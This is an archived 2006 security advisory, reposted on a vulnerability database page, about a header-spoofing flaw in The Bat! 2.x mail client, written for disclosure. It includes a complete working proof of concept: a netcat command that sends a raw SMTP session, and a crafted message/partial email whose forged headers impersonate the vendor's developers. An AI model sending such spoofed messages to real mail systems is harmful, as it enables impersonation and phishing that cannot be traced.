Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11310
HistoryFeb 06, 2006 - 12:00 a.m.

SECURITY.NNOV: The Bat! 2.x message headers spoofing

2006-02-0600:00:00
vulners.com
52
JSON

Title: The Bat! 2.x message headers spoofing
Author: 3APA3A <[email protected]>
Homepage: http://www.security.nnov.ru/
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp
Vendor: RitLabs
Vendor's page http://thebat.net/
Application: The Bat 2.x (2.12.04 tested)
Not vulnerable: The Bat! 3.5
Remote: Yes, against client
Category: Information spoofing

Intro:

The Bat! is very convenient, powerful and secure (comparing with
others) MUA (Mail User Agent) with many professional features:
templates, macroses, Bayesian SPAM filter, etc. This is commercial
product from RitLabs.

Vulnerability:

Design flow in the way The Bat! shows message/partial messages allow
attacker to spoof RFC 822 headers or original message, including all
Received: and Message-ID:. It makes it possible to create untrackable
message and spoof message origin, including sender's network.

Details:

The Bat! silently re-assembles partial message and shows encapsulated
data. The headers shown are ones of encapsulated message. Real headers
are lost completely.

Exploit:

Replace @example.com with destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt

-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <[email protected]>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-

Workaround:

Do not trust data The Bat! shows in headers.

Solution:

Upgrade to The Bat! 3.x (not free)

JSON